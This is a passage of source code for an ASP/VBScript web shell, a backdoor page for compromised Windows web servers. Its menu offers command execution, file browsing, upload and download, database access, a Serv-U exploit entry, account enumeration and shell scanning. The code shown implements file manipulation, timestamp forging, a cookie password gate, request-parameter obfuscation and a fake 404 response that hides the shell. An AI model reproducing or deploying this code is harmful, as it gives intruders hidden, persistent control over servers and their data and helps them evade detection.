Arial,Tahoma;background:#fff;padding:1px;width:100%;BORDER-WIDTH:1px;} .area{font:12px 'Courier New',Monospace;background:#fff;border: 1px solid #666;padding:2px;} a{color: #00f;text-decoration:underline;} a:hover{color: #f00;text-decoration:none;} .alt1Span{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ededed;padding:2px 10px 2px 5px;width:100%;height:28px} .alt0Span{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#fafafa;padding:2px 10px 2px 5px;width:100%;height:28px} .link td{border-top:1px solid #fff;border-bottom:1px solid #ccc;background:#e8e8e8;padding:5px 10px 5px 5px;} .alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ededed;padding:2px 10px 2px 5px;height:28px} .alt0 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#fafafa;padding:2px 10px 2px 5px;height:28px} .focusTr td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ddddff;padding:2px 10px 2px 5px;height:28px} .head td{border-top:1px solid #ccc;border-bottom:1px solid #bbb;background:#e0e0e0;padding:5px 10px 5px 5px;font-weight:bold;} .headSpan{border-top:1px solid #fff;margin:2;background:#e0e0e0;width:100%;} form{margin:0;padding:0;} .bt{border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:23px;padding:3px 5px 5px 5px;} h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;} ul.info li{margin:0;color:#444;line-height:24px;height:24px;} u{text-decoration: none;color:#777;float:left;display:block;width:50%;margin-right:10px;} label{font:12px Arial,Tahoma;float:left;width:20%;} .lbl{font:12px Arial,Tahoma;float:none;width:auto;} </style> <script language="javascript"> function showHideMe(obj){ var sender=event.srcElement; if(obj.style.display=='none'){ obj.style.display=''; sender.className='showhref'; }else{ obj.style.display='none'; sender.className='hidehref'; } } </script> <script language="vbscript"> Function dosubmit(strAction,strSubAct,Str) On Error Resume Next Dim renStr actForm.goaction.value=strAction actForm.subAct.value=strSubAct If(strAction="FsoFileExplorer"Or strAction="SaFileExplorer")And InStr(Str,":\")<1 And Str<>"" Then Str=nowPath.value&Str actForm.pubPam.value=secretEncode(Str) Select Case strSubAct Case"fileUpload" doEncode("upform") upform.submit() Case"safile" doEncode("saform") saform.submit() Case"cpFolder","mvFolder","mvFile","cpFile","rnFile","rnFolder","modIfyTime" Select Case strSubAct Case"mvFile","mvFolder" renStr=InputBox("Move to :","Move",Left(Str,InstrRev(Str,"\"))) Case"cpFile","cpFolder" renStr=InputBox("Copy to :","Copy",Left(Str,InstrRev(Str,"\"))) Case"rnFile","rnFolder" renStr=InputBox("Rename as :","Rename",Mid(Str,InstrRev(Str,"\")+1)) If strSubAct="rnFile"Then Do While InStr(renStr,".")<1 And renStr<>"" renStr=InputBox("Invalid file name format!","Rename","") Loop End If Case Else renStr=InputBox("ModIfy as :","ModIfy time","") End Select If renStr=""Then Exit Function actForm.pubPam.value=secretEncode(Str&"|"&renStr) actForm.submit() Case"delFile","delFolder" If Window.confirm("Delete it?Are you sure?")Then actForm.submit() Case Else actForm.submit() End Select End Function Function secretEncode(pamToEn) If Not <%=needEncode%> Or pamToEn=""Then secretEncode=pamToEn Exit Function End If Dim tt,tmpchr tt="" For i=1 To Len(pamToEn) tmpchr=Mid(pamToEn,i,1) If Asc(tmpchr)<128 And Asc(tmpchr)>0 Then tt=tt&Asc(tmpchr)+<%=encodeNum%>&"<%=encodeCut%>" Else tt=tt&tmpchr&"<%=encodeCut%>" End If Next secretEncode=Left(tt,Len(tt)-1) End Function Function doEncode(formId) On Error Resume Next Dim pamArr pamArr=Split("<%=pamtoEncode%>","|") For Each strPam In pamArr On Error Resume Next:Execute formId&"."&strPam&".value=secretEncode("&formId&"."&strPam&".value)" Next End Function Function dosqlsubmit(strSubAct,connStr,queryStr,strTable,intPage) sqlForm.subAct.value=strSubAct If strSubAct="delTable"Then If Not Window.confirm("Delete this table?Are you sure?")Then Exit Function End If If connStr<>""Then If InStr(1,connStr,"PROVIDER=",1)<1 Then connStr="<%=getJetStr("")%>"&nowPath.value&connStr sqlForm.connStr.value=connStr End If 'If strTable<>""And <%=dbType<>"others"%> Then strTable="["&strTable&"]" sqlForm.connStr.value=secretEncode(sqlForm.connStr.value) sqlForm.queryStr.value=secretEncode(queryStr) sqlForm.strTable.value=secretEncode(strTable) sqlForm.intPage.value=intPage sqlForm.submit() End Function Function getconnStr(server,user,pass,db) form1.connStr.value="PROVIDER=SQLOLEDB;DATA SOURCE="&server&";UID="&user&";PWD="&pass&";DATABASE="&db&"" End Function Function getAccStr(dbpath) form1.connStr.value="<%=getJetStr("")%>"&dbpath End Function Function decpams() 'On Error Resume Next Dim subobj,regex Set regex=new RegExp regex.Global=True regex.IgnoreCase=True regex.MultiLine=True regex.Pattern="^((\d+|.)<%=encodeCut%>)+(\d+|.)$" For Each subForm In Document.Forms For Each subobj In subForm.Elements If InStr("|<%=pamtoEncode%>|","|"&subobj.id&"|")>0 And regEx.Test(subobj.value)Then subobj.value=secretDecode(subobj.value) Next Next End Function Function secretDecode(pamToDecode) If Not <%=needEncode%> Or pamToDecode=""Then secretDecode=pamToDecode Exit Function End If Dim dd,tmpArr dd="" tmpArr=Split(pamToDecode,"<%=encodeCut%>") For i=0 To UBound(tmpArr) If IsNumeric(tmpArr(i))Then dd=dd&Chr(CInt(tmpArr(i))-<%=encodeNum%>) Else dd=dd&tmpArr(i) End If Next secretDecode=dd End Function </script> </head> <body style="margin:0;table-layout:fixed; word-break:break-all;"bgcolor="#f9f9f9"> <table width="100%"border="0"cellpadding="0"cellspacing="0"> <tr class="head"> <td style="width:30%"><br><%=getServerVariable("LOCAL_ADDR")&"("&serverName&")"%></td> <td align="center" style="width:40%"><br> <b><%doFont sversion,"#0099FF","3"%></b><br> </td> <td style="width:30%"align="right"><%=getAds()%></td> </tr> <form id="actForm"method="post"action="<%=pagePath%>"> <input type="hidden" id="goaction" name="goaction" value=""> <input type="hidden" id="subAct" name="subAct" value=""> <input type="hidden" id="pubPam" name="pubPam" value=""> </form> <form id="sqlForm"method="post"action="<%=pagePath%>"> <input type="hidden" id="goaction" name="goaction" value="MsDataBase"> <input type="hidden" id="subAct" name="subAct" value=""> <input type="hidden" id="connStr" name="connStr" value="<%=connStr%>"> <input type="hidden" id="queryStr" name="queryStr" value=""> <input type="hidden" id="strTable" name="strTable" value=""> <input type="hidden" id="intPage" name="intPage" value=""> </form> <% If logged Then %> <tr class="link"> <td colspan="3"> <a href="javascript:dosubmit('infoAboutSrv','','');">Server Info</a> | <a href="javascript:dosubmit('objOnSrv','','');">Object Info</a> | <a href="javascript:dosubmit('userList','','');">User Info</a> | <a href="javascript:dosubmit('CSInfo','','');">C-S Info</a> | <a href="javascript:dosubmit('WsCmdRun','','');">WS Execute</a> | <a href="javascript:dosubmit('FsoFileExplorer','','');">FSO File</a> | <a href="javascript:dosubmit('SaFileExplorer','','');">App File</a> | <a href="javascript:dosubmit('MsDataBase','','');">DataBase</a> | <a href="javascript:dosubmit('AddToMdb','','');">File Packager</a> | <a href="javascript:dosubmit('TxtSearcher','','');">File Searcher</a> | <a href="javascript:dosubmit('ServUp','','');">ServU Exp</a> | <a href="javascript:dosubmit('ScanShell','','');">Scan Shells</a> | <a href="javascript:dosubmit('OtherTools','','');">Some Others...</a> | <a href="javascript:dosubmit('Logout','','');">Logout</a> | <a href="javascript:decpams();">Decode</a> </td> </tr> <% End If %></table><div class="main"><br> <% echo"<b>" doFont strTitle&"»","#0099ff","2" echoLine"</b><br><br>" End Sub Sub show404() Dim sitedir sitedir=getLeft(getServerVariable("PATH_INFO"),"/",False) echo xmlGet("http://"&serverName&sitedir&"/"&fToPre&"?"&getServerVariable("QUERY_STRING"),"GET") Response.status=objXml.status response.End End Sub Sub getObjInfo(strObjInfo,strDscInfo) Dim objTmp If Not isDebugMode Then On Error Resume Next echo"<li><u>"&strObjInfo If strDscInfo<>""Then echo"(Object "&strDscInfo&")" End If echo"</u>" If Err Then Err.Clear Set objTmp=CreateObj(strObjInfo) If Err Then doFont htmlEnc("Disabled"),"red","" Else doFont htmlEnc("Enabled "),"green","" echo"Version:"&objTmp.Version&";" echo"About:"&objTmp.About End If echo"</li>" If Err Then Err.Clear Set objTmp=Nothing End Sub Sub showUserInfo(strUser) Dim User,Flags,lastlog If Not isDebugMode Then On Error Resume Next Set User=getObj("WinNT://./"&strUser&",user") Flags=User.Get("UserFlags") lastlog=User.LastLogin doTr 0 doTd"Description","20%" doTd User.Description,"80%" doTtr doTr 1 doTd"Belong to","" doTd getItsGroup(strUser),"" doTtr doTr 0 doTd"Password expired","20%" doTd CBool(User.Get("PasswordExpired")),"80%" doTtr doTr 1 doTd"Password never expire","" doTd cbool(Flags And&H10000),"" doTtr doTr 0 doTd"Can't change password","" doTd cbool(Flags And&H00040),"" doTtr doTr 1 doTd"Global-group account","" doTd cbool(Flags And&H100),"" doTtr doTr 0 doTd"Password length at least","" doTd User.PasswordMinimumLength,"" doTtr doTr 1 doTd"Password required","" doTd User.PasswordRequired,"" doTtr doTr 0 doTd"Account disabled","" doTd User.AccountDisabled,"" doTtr doTr 1 doTd"Account locked","" doTd User.IsAccountLocked,"" doTtr doTr 0 doTd"User profile","" doTd User.Profile,"" doTtr doTr 1 doTd"User loginscript","" doTd User.LoginScript,"" doTtr doTr 0 doTd"Home directory","" doTd User.HomeDirectory,"" doTtr doTr 1 doTd"Home drive","" doTd User.Get("HomeDirDrive"),"" doTtr doTr 0 doTd"Last login","" doTd lastlog,"" doTtr If Err Then Err.Clear End Sub Function getItsGroup(strUser) Dim objUser,objGroup Set objUser=getObj("WinNT://./"&strUser&",user") For Each objGroup in objUser.Groups getItsGroup=getItsGroup&" "&objGroup.Name Next End Function Function FsoRead(thePath) Set objCountFile=objFso.OpenTextFile(thePath,1,True) FsoRead=Replace(objCountFile.ReadAll,Chr(0)," ") objCountFile.Close Set objCountFile=Nothing End Function Function streamLoadFromFile(thePath) If Not isDebugMode Then On Error Resume Next Set objStream=CreateObj("Adodb.Stream") With objStream .Type=2 .Mode=3 .Open .LoadFromFile thePath If subAct="utfEdit" Then .CharSet="utf-8" Else .CharSet=defaultChr End If .Position=2 streamLoadFromFile=Replace(.ReadText(),Chr(0)," ") .Close End With Set objStream=Nothing End Function Sub streamSaveToFile(thePath,fileContent,stype) If Not isDebugMode Then On Error Resume Next Set objStream=CreateObj("Adodb.Stream") With objStream .Type=stype .Mode=3 .Open If subAct="utfSave"Then .CharSet="utf-8" ElseIf subAct="Save"Then .CharSet=defaultChr End If If stype=2 Then .WriteText fileContent Else .Write fileContent End If objStream.SavetoFile thePath,2 .Close End With Set objStream=Nothing End Sub Sub fsoSaveToFile(thePath,fileContent) Dim theFile Set theFile=objFso.OpenTextFile(thePath,2,True) theFile.Write fileContent theFile.Close Set theFile=Nothing End Sub Sub newOne() If Not isDebugMode Then On Error Resume Next If newOneType="file"Then thePath=thePath&"\"&newOneName Call objFso.CreateTextFile(thePath,False) showEdit Else objFso.CreateFolder(thePath&"\"&newOneName) End If If Err Then chkerr(Err) Else errMsgAdd"File/folder created" End If End Sub Sub renameOne() Dim tagName,objFolder,parPath,oriName If Not isDebugMode Then On Error Resume Next thePath=getLeft(pubPam,"|",False) tagName=getRight(pubPam,"|") If InStr(thePath,"\")<1 Then thePath=thePath&"\" Dim theFile,fileName,theFolder If thePath=""Or tagName=""Then errMsgAdd"Parameter wrong!" Exit Sub End If If strFileMethod="fso"Then If subAct="renamefolder"Then Set theFolder=objFso.GetFolder(thePath) theFolder.Name=tagName Set theFolder=Nothing Else Set theFile=objFso.GetFile(thePath) theFile.Name=tagName Set theFile=Nothing End If Else oriName=getRight(thePath,"\") parPath=getLeft(thePath,"\",False) Set objFolder=objSa.NameSpace(parPath) Set objItem=objFolder.ParseName(oriName) objItem.Name=tagName End If If Err Then chkerr(Err) Else errMsgAdd"Rename completed" End If End Sub Sub delOne() If Not isDebugMode Then On Error Resume Next If subAct="delFolder"Then Call objFso.DeleteFolder(thePath,True) Else Call objFso.DeleteFile(thePath,True) End If If Len(thePath)=2 Then thePath=thePath&"\" If Err Then chkerr(Err) Else errMsgAdd"File/folder deleted" End If End Sub Sub moveCopyOne() Dim oriPath,tagPath,objTargetFolder,objOriPath,objSa2 If Not isDebugMode Then On Error Resume Next thePath=Left(pubPam,Instr(pubPam,"|")-1) tagPath=Mid(pubPam,InStr(pubPam,"|")+1) If thePath=""Or tagPath=""Then errMsgAdd"Parameter wrong!" Exit Sub End If Select Case subAct Case"cpFolder" Call objFso.CopyFolder(thePath,tagPath) Case"cpFile" Call objFso.CopyFile(thePath,tagPath) Case"mvFolder" Call objFso.MoveFolder(thePath,tagPath) Case"mvFile" echo thePath&"||"&tagPath Call objFso.MoveFile(thePath,tagPath) End Select If Err Then chkerr(Err) Else errMsgAdd"File/folder copyed/moved" End If End Sub Sub modIfyTime() Dim oItem,fileToModIfy,newDate,oFolder If Not isDebugMode Then On Error Resume Next thePath=Left(pubPam,Instr(pubPam,"|")-1) If Right(thePath,1)="\"And Len(thePath)>3 Then thePath=Left(thePath,Len(thePath)-1) fileToModIfy=getRight(thePath,"\") newDate=Mid(pubPam,Instr(pubPam,"|")+1) thePath=getLeft(thePath,"\",False) Set oFolder=objSa.NameSpace(thePath) Set oItem=oFolder.ParseName(fileToModIfy) If newDate<>""Then If IsDate(newDate) Then oItem.ModIfyDate=newDate End If If Err Then chkerr(Err) Else errMsgAdd"Time modIffied" End If Set oItem=Nothing Set oFolder=Nothing End Sub Sub downTheFile() Response.Clear If Not isDebugMode Then On Error Resume Next Dim fileName,fileContentType fileName=getRight(thePath,"\") Set objStream=CreateObj("Adodb.Stream") objStream.Open objStream.Type=1 objStream.LoadFromFile(thePath) chkerr(Err) Session.CodePage=936 Response.AddHeader"Content-Disposition","Attachment; Filename="&fileName Session.CodePage=65001 Response.AddHeader"Content-Length",objStream.Size Response.ContentType="Application/Octet-Stream" Response.BinaryWrite objStream.Read Response.Flush() objStream.Close Set objStream=Nothing End Sub Class upload_5xsoft Dim objForm,objFile Public Function Form(strForm) strForm=Lcase(strForm) If Not objForm.exists(strForm) Then Form="" Else Form=objForm(strForm) End If End Function Public Function File(strFile) If Not isDebugMode Then On Error Resume Next strFile=Lcase(strFile) If not objFile.exists(strFile) Then Set File=new FileInfo Else Set File=objFile(strFile) End If End Function Private Sub Class_Initialize If Not isDebugMode Then On Error Resume Next Dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile Dim IfileSize,sFilePath,sFileType,sFormValue,sFileName Dim IfindStart,IfindEnd Dim IformStart,IformEnd,sFormName Set objForm=CreateObj("Scripting.Dictionary") Set objFile=CreateObj("Scripting.Dictionary") If Request.TotalBytes<1 Then Exit Sub Set tStream=CreateObj("adodb.stream") Set objStream=CreateObj("adodb.stream") objStream.Type=1 objStream.Mode=3 objStream.Open objStream.Write Request.BinaryRead(Request.TotalBytes) objStream.Position=0 RequestData=objStream.Read IformStart=1 IformEnd=LenB(RequestData) vbCrlf=chrB(13)&chrB(10) sStart=MidB(RequestData,1,InStrB(IformStart,RequestData,vbCrlf)-1) iStart=LenB(sStart) IformStart=IformStart+iStart+1 While(IformStart+10)<IformEnd iInfoEnd=InStrB(IformStart,RequestData,vbCrlf & vbCrlf)+3 tStream.Type=1 tStream.Mode=3 tStream.Open objStream.Position=IformStart objStream.CopyTo tStream,iInfoEnd-IformStart tStream.Position=0 tStream.Type=2 tStream.CharSet="gb2312" sInfo=tStream.ReadText tStream.Close IformStart=InStrB(iInfoEnd,RequestData,sStart) IfindStart=InStr(22,sInfo,"name=""",1)+6 IfindEnd=InStr(IfindStart,sInfo,"""",1) sFormName=Lcase(Mid(sinfo,IfindStart,IfindEnd-IfindStart)) If InStr(45,sInfo,"filename=""",1) > 0 Then Set theFile=new FileInfo IfindStart=InStr(IfindEnd,sInfo,"filename=""",1)+10 IfindEnd=InStr(IfindStart,sInfo,"""",1) sFileName=Mid(sinfo,IfindStart,IfindEnd-IfindStart) theFile.FileName=getFileName(sFileName) theFile.FilePath=getFilePath(sFileName) theFile.FileExt=GetFileExt(sFileName) IfindStart=InStr(IfindEnd,sInfo,"Content-Type: ",1)+14 IfindEnd=InStr(IfindStart,sInfo,vbCr) theFile.FileType =Mid(sinfo,IfindStart,IfindEnd-IfindStart) theFile.FileStart =iInfoEnd theFile.FileSize=IformStart-iInfoEnd-3 theFile.FormName=sFormName If not objFile.Exists(sFormName)Then objFile.add sFormName,theFile End If Else tStream.Type =1 tStream.Mode =3 tStream.Open objStream.Position=iInfoEnd objStream.CopyTo tStream,IformStart-iInfoEnd-3 tStream.Position=0 tStream.Type=2 tStream.CharSet ="gb2312" sFormValue=tStream.ReadText tStream.Close If objForm.Exists(sFormName) Then objForm(sFormName)=objForm(sFormName)&","&sFormValue Else objForm.Add sFormName,sFormValue End If End If IformStart=IformStart+iStart+1 wEnd RequestData="" Set tStream =nothing End Sub Private Sub Class_Terminate If Not isDebugMode Then On Error Resume Next If Request.TotalBytes>0 Then objForm.RemoveAll objFile.RemoveAll Set objForm=nothing Set objFile=nothing objStream.Close Set objStream =nothing End If End Sub Private Function GetFilePath(FullPath) If Not isDebugMode Then On Error Resume Next If FullPath<>"" Then GetFilePath=left(FullPath,InStrRev(FullPath,"\")) Else GetFilePath="" End If End Function Private Function GetFileExt(FullPath) If FullPath<>"" Then GetFileExt=mid(FullPath,InStrRev(FullPath,".")+1) Else GetFileExt="" End If End Function Private Function GetFileName(FullPath) If FullPath<>"" Then GetFileName=mid(FullPath,InStrRev(FullPath,"\")+1) Else GetFileName="" End If End Function End Class Class FileInfo Dim FormName,FileName,FilePath,FileSize,FileExt,FileType,FileStart Private Sub Class_Initialize FileName="" FilePath="" FileSize=0 FileStart= 0 FormName="" FileType="" FileExt = "" End Sub Public Function SaveAs(FullPath) Dim dr,ErrorChar,i SaveAs=True If Trim(fullpath)="" or FileStart=0 or FileName="" or Right(fullpath,1)="/" Then exit Function Set dr=CreateObject("Adodb.Stream") dr.Mode=3 dr.Type=1 dr.Open objStream.position=FileStart objStream.copyto dr,FileSize dr.SaveToFile FullPath,2 dr.Close Set dr=nothing SaveAs=False End Function Public Function InFile() objStream.position=FileStart InFile=objStream.Read(FileSize) End Function End Class Sub streamUpload() If Not isDebugMode Then On Error Resume Next If thePath="" Then thePath=aspPath If InStr(thePath,":")<1 Then thePath=aspPath&"\"&thePath Set theFile=cls_upload.File("upfile") If destName="" Then destName=theFile.FileName theFile.SaveAs(thePath&"\"&destName) If Err Then chkerr(Err) Else errMsgAdd("Upload Sucess") End If End Sub Function xmlGet(strUrl,method) If Not isDebugMode Then On Error Resume Next Dim pams If method="POST" Then pams=Split(strUrl,"?")(1) strUrl=Split(strUrl,"?")(0) End If objXml.Open method,strUrl,False If method="POST" Then objXml.SetRequestHeader"Content-Type","application/x-www-form-urlencoded" objXml.send pams Else objXml.send End If If regTest(objXml.getAllResponseHeaders(),"charSet ?= ?[""']?[\w-]+")Then pagecharSet=Trim(regReplace(regExecute(objXml.getAllResponseHeaders(),"charSet ?= ?[""']?[\w-]+",False)(0),"charSet ?= ?[""']?","",False)) ElseIf regTest(objXml.ResponseText,"charSet ?= ?[""']?[\w-]+")Then pagecharSet=Trim(regReplace(regExecute(objXml.ResponseText,"charSet ?= ?[""']?[\w-]+",False)(0),"charSet ?= ?[""']?","",False)) End If If pagecharSet=""Then pagecharSet=defaultChr xmlGet=bin2str2(objXml.responseBody,pagecharSet) End Function Function isIn() If Request.Cookies(cookiePass)=""Then isIn=False Exit Function End If If CFSEncode(Request.Cookies(cookiePass))=pass Then isIn=True Else isIn=False End If End Function Function secretEncode(pamToEn) If Not needEncode Or pamToEn=""Then secretEncode=pamToEn Exit Function End If Dim tt,tmpchr tt="" For i=1 To Len(pamToEn) tmpchr=Mid(pamToEn,i,1) If Asc(tmpchr)<128 And Asc(tmpchr)>0 Then tt=tt&Asc(tmpchr)+encodeNum&encodeCut Else tt=tt&tmpchr&encodeCut End If Next secretEncode=Left(tt,Len(tt)-1) End Function Function secretDecode(pamToDecode) If Not needEncode Or pamToDecode="" Or Not regTest(pamToDecode,"^((\d+|.)"&encodeCut&")+(\d+|.)$")Then secretDecode=pamToDecode Exit Function End If Dim dd,tmpArr dd="" tmpArr=Split(pamToDecode,encodeCut) For i=0 To UBound(tmpArr) If IsNumeric(tmpArr(i))Then dd=dd&Chr(CInt(tmpArr(i))-encodeNum) Else dd=dd&tmpArr(i) End If Next secretDecode=dd End Function Function getADS() Dim ADSstr,gwidth,gheight gwidth=88 gheight=31 ADSstr="<br>" ADSstr=ADSstr&"<a href='http://www.vtwo.cn/' target='_blank'>Bink Team</a> | " ADSstr=ADSstr&"<a href='http://0kee.com/' target='_blank'>0kee Team</a> | " ADSstr=ADSstr&"<a href='http://www.t00ls.net/' target='_blank'>T00ls</a> | " ADSstr=ADSstr&"<a href='http://www.helpsoff.com.cn' target='_blank'>Fuck Tencent</a>" getADS=ADSstr End Function Function bin2str2(binstr,strcharSet) If Not isDebugMode Then On Error Resume Next Dim BytesStream,StringReturn Set BytesStream=CreateObj("Adodb.Stream") With BytesStream .Type=2 .Open .WriteText binstr .Position=0 .CharSet=strcharSet .Position=2 StringReturn=.ReadText(.Size) .close End With Set BytesStream=Nothing bin2str2=StringReturn End Function Function getServerVariable(str) getServerVariable=Request.ServerVariables(str) End Function Function CreateObj(strObj) Set CreateObj=Server.CreateObject(strObj) End Function Function getObj(strObj) Set getObj=GetObject(strObj) End Function Function UrlEnc(str) UrlEnc=server.urlencode(str) End Function Function getHex(str) Dim tmphex,tmpstr tmphex="" For i=0 To Len(str)-1 tmpstr=Right(str,Len(str)-i) If Asc(tmpstr)<16 Then tmphex=tmphex&"0" tmphex=tmphex&CStr(Hex(Asc(tmpstr))) Next getHex="0x"&tmphex End Function Function getUtf(str) Dim tmphex,tmpstr tmphex="" For i=0 To Len(str)-1 tmpstr=Right(str,Len(str)-i) tmphex=tmphex&CStr(Hex(Asc(tmpstr)))&"00" Next getUtf="0x"&tmphex End Function Function htmlEnc(str) str=textEncode(str) str=Replace(str,Chr(13)&Chr(10),"<br>") htmlEnc=Replace(str," "," ") End Function Function textEncode(str) If Not isDebugMode Then On Error Resume Next str=CStr(str) If IsNull(str)Or str=""Then textEncode="" Exit Function End If textEncode=Server.HtmlEncode(str) End Function Function mapath(str) mapath=Server.MapPath(str) End Function Sub chkerr(Err) If Err Then errMsgAdd"Exception :"&Err.Description errMsgAdd"Exception source :"&Err.Source Err.Clear End If End Sub Function CfsEnCode(ByVal CodeStr) Dim CodeLen Dim CodeSpace Dim NewCode CodeLen=30 CodeSpace=CodeLen-Len(CodeStr) If Not CodeSpace<1 Then For cecr=1 To CodeSpace CodeStr=CodeStr&Chr(21) Next End If NewCode=1 Dim Ben For cecb=1 To CodeLen Ben=CodeLen+Asc(Mid(CodeStr,cecb,1)) * cecb NewCode=NewCode * Ben Next CodeStr=NewCode NewCode=Empty For cec=1 To Len(CodeStr) NewCode=NewCode&CfsCode(Mid(CodeStr,cec,3)) Next For cec=20 To Len(NewCode)-18 Step 2 CfsEnCode=CfsEnCode&Mid(NewCode,cec,1) Next End Function Function CfsCode(word) For cc=1 To Len(word) CfsCode=CfsCode&Asc(Mid(word,cc,1)) Next CfsCode=Hex(CfsCode) End Function Function getTheSize(theSize) If theSize>=(1024 * 1024 * 1024)Then getTheSize=Fix((theSize /(1024 * 1024 * 1024))* 100)/ 100&"G" If theSize>=(1024 * 1024)And theSize<(1024 * 1024 * 1024)Then getTheSize=Fix((theSize /(1024 * 1024))* 100)/ 100&"M" If theSize>=1024 And theSize<(1024 * 1024)Then getTheSize=Fix((theSize / 1024)* 100)/ 100&"K" If theSize>=0 And theSize<1024 Then getTheSize=theSize&"B" End Function Function getDriveType(num) Select Case num Case 0 getDriveType="Unknown" Case 1 getDriveType="Removable" Case 2 getDriveType="Local drive" Case 3 getDriveType="Net drive" Case 4 getDriveType="CD-ROM" Case 5 getDriveType="RAM disk" End Select End Function Function doPathFormat(ByVal str) str=Replace(str,"\","\\") doPathFormat=Replace(str,"\\\\","\\") End Function Function getJetStr(str) getJetStr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&str End Function Function getLeft(str,sign,fromLeft) If str="" Or InStr(str,sign)<1 Then getLeft="" Exit Function End If If fromLeft Then getLeft=Left(str,InStr(str,sign)-1) Else getLeft=Left(str,InstrRev(str,sign)-1) End If End Function Function getRight(str,sign) If str="" Or InStr(str,sign)<1 Then getRight="" Exit Function End If getRight=Mid(str,InstrRev(str,sign)+Len(sign)) End Function Sub echo(str) Response.Write str End Sub Sub echoLine(str) echo str&vbCrLf End Sub Sub doShowHideMe(strObj,hideMe) echo"<a href='#' onClick=""javascript:showHideMe("&strObj&")"" id='"&strObj&"href' class='hidehref'>"&strObj&" :</a>" echo"<span id="&strObj If hideMe Then echo" style='display:none;'" echoLine">" End Sub Sub doSubHref(goact,subact,pamms,showStr,plus) echoLine"<a href=""javascript:dosubmit('"&goact&"','"&subact&"','"&pamms&"')"">"&showStr&"</a>"&plus End Sub Sub doSqlHref(subAct,connStr,queryStr,tbname,intPage,showStr,plus) echoLine"<a href=""javascript:dosqlsubmit('"&subAct&"','"&connStr&"','"&queryStr&"','"&tbname&"','"&intPage&"')"">"&showStr&"</a>"&plus End Sub Sub doFont(str,color,size) echo"<font color="""&color&"""" If size<>""Then echo" size="""&size&"""" echoLine">"&str&"</font>" End Sub Sub doTable(width) echoLine"<table width="""&width&"""border=""0""cellpadding=""0""cellspacing=""0"">" End Sub Sub doTtable() echoLine"</table>" End Sub Sub doTr(num) echo"<tr class='alt"&num&"' onmouseover=""javascript:this.className='focusTr';"" onmouseout=""javascript:this.className='alt"&num&"';"">" End Sub Sub doTh() echo"<tr class='link'>" End Sub Sub doSpan(num) echo"<span class='alt"&num&"Span'>" End Sub Sub doHideSpan(strObj,hideMe) echo"<span id="&strObj If hideMe Then echo" style='display:none;'" echoLine">" End Sub Sub doForm(needEn) echo"<form method=""post"" id=""form"&formId&""" action="""&pagePath&"""" If needEn Then echo" onSubmit=""javascript:doEncode('form"&formId&"')""" echoLine">" doHidden"goaction",goaction formId=formId+1 End Sub Sub doFform() echoLine"</form>" End Sub Sub doTdSubmit(value,width) echo"<td style=""width:"&width&""">" echo"<input type=""submit"" value="""&value&""" class=""bt"">" echoLine"</td>" End Sub Sub doTdFont(str,color,size) echo"<td>" doFont str,color,size echoLine"</td>" End Sub Sub doTtr() echoLine"</tr>" End Sub Sub doTd(td,width) If td=""Or IsNull(td)Then td="<font color=""red"">Null</font>" echo"<td" If width<>""Then echo" width='"&width&"'" echo">" echo CStr(td) echoLine"</td>" End Sub Sub doInput(typpe,name,value,size,plus) Dim cls If typpe="button"Or typpe="submit"Or typpe="reSet"Then cls="bt" Else cls="input" End If echo"<input type="""&typpe&""" name="""&name&""" id="""&name&""" value="""&textEncode(value)&""" size="""&size&""" class="""&cls&""" "&plus&"/>" End Sub Sub doChkBox(name,value,showname,plus) doInput"checkbox",name,value,"",plus echo"<label class=""lbl"" for="""&name&""">"&showname&"</label>" End Sub Sub doHidden(name,value) echoLine"<input type=""hidden"" name="""&name&""" id="""&name&""" value="""&value&""">" End Sub Sub doTdInput(typpe,name,value,width,plus,span) Dim cls If typpe="button"Or typpe="submit"Or typpe="reSet"Then cls="bt" Else cls="tdInput" End If If span=""Then span=1 echo"<td colspan="&span&" style=""width:"&width&""">" echo"<input type="""&typpe&""" name="""&name&""" id="""&name&""" value="""&textEncode(value)&""" class="""&cls&""" "&plus&">" echoLine"</td>" End Sub Sub doSubmit(value) echoLine"<input type=""submit"" value="""&value&""" class=""bt"">" End Sub Sub doTdText(name,value,rows) echo"<td>" doTextarea name,value,"100%",rows," class=""tdText""" echoLine"</td>" End Sub Sub doTdNoWrap(str) If Not isDebugMode Then On Error Resume Next If IsObject(str)Or IsNull(str)Or str="" Then str="<font color=red>Null<font>" echo"<td nowrap>"&str&"</td>" End Sub Sub doTextarea(name,value,width,rows,plus) echo"<textarea name="""&name&""" id="""&name&""" style=""width:"&width&";"" rows="""&rows&""" class=""text"" "&plus&">" echo textEncode(value) echoLine"</textarea>" End Sub Sub doUl() echo"<ul class=""info"">" End Sub Sub doSelect(name,width,plus) echoLine"<select style=""width:"&width&""" name="""&name&""" "&plus&">" End Sub Sub doSselect() echoLine"</select>" End Sub Sub doOption(value,str) echoLine"<option value="""&value&""">"&str&"</option>" End Sub Sub trIdAdd() trId=trId+1 If trId>=2 Then trId=0 End Sub Sub doLabel(str) echoLine"<label>"&str&"</label>" End Sub Sub errMsgAdd(str) errMsg=errMsg&"<li>"&str&"</li>" End Sub Sub dieErr(Err) If Err Then chkerr(Err) doFin End If End Sub Function regTest(str,strPattern) objRe.Pattern=strPattern regTest=objRe.Test(str) End Function Function regExecute(str,strPattern,needFormat) If needFormat Then strPattern=regFormat(strPattern) objRe.Pattern=strPattern Set regExecute=objRe.Execute(str) End Function Function regReplace(str,strPattern,replaced,needFormat) If needFormat Then strPattern=regFormat(strPattern) objRe.Pattern=strPattern regReplace=objRe.Replace(str,replaced) End Function Function regFormat(str) str=Replace(str,"\","\\") str=Replace(str,".","\.") str=Replace(str,"?","\?") str=Replace(str,"+","\+") str=Replace(str,"(","\(") str=Replace(str,")","\)") str=Replace(str,"*","\*") str=Replace(str,"[","\[") str=Replace(str,"]","\]") regFormat=str End Function %>